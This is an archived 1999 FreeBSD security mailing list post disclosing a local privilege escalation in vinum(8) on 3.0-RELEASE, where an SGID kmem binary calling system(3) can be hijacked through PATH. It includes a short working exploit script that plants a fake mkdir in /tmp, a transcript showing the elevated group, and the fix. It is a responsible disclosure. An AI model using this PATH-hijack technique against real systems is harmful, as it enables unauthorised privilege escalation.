Skip site navigation (1)Skip section navigation (2) 
Date:      Wed, 27 Jan 1999 10:50:39 -0700 (MST)
From:      Paul Hart <hart@iserver.com>
To:        freebsd-security@FreeBSD.ORG
Subject:   Large security hole in vinum(8) in 3.0-RELEASE
Message-ID:  <Pine.BSF.3.96.990127103410.19271A-100000@anchovy.orem.iserver.com>
next in thread | raw e-mail | index | archive | help 
On January 13, 1999 (two weeks ago), I notified the FreeBSD security
officer and the author of vinum(8) of a large security hole that affects
vinum(8) in 3.0-RELEASE.  It seems appropriate to disclose this hole now
in a public forum, seeing as the author has corrected the problem.

In at least 3.0-RELEASE /sbin/vinum is SGID kmem and can be leveraged to
run arbitrary code with an EGID of kmem.  Now this not as bad of a hole as
say a root compromise, but it can lead to a number of serious local
attacks against a FreeBSD host, such as examining contents of /dev/mem or
/dev/kmem, which could in turn be leveraged for root access. 

Here is a transcript of what I mean:

    % uname -r
    3.0-RELEASE
    % id
    uid=100(hart) gid=100(hart) groups=100(hart), 0(wheel)
    % ./vino
    $ id
    uid=100(hart) gid=100(hart) egid=2(kmem) groups=2(kmem), 100(hart), 0(wheel)
    $ 

Whoops!  My sample exploit code (vino) is:

    #!/bin/sh
    PATH=/tmp:$PATH
    echo "#!/bin/sh
    exec /bin/sh" > /tmp/mkdir
    chmod 755 /tmp/mkdir
    /sbin/vinum

Looking through the code to vinum(8), the problem can be traced to the
dangerous use of system(3) in a privileged program.  But as it turns out,
vinum(8) doesn't need to be SGID.  From discussion with the author, this
installation mode appears to have crept into the vinum(8) Makefile from
the Makefile for ccdconfig(8) by accident.  So this turns out to be easy
to fix -- simply remove the SGID bit from /sbin/vinum. 

Paul Hart

--
Paul Robert Hart        ><8>  ><8>  ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8>  ><8>  ><8>        http://www.iserver.com/


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.990127103410.19271A-100000>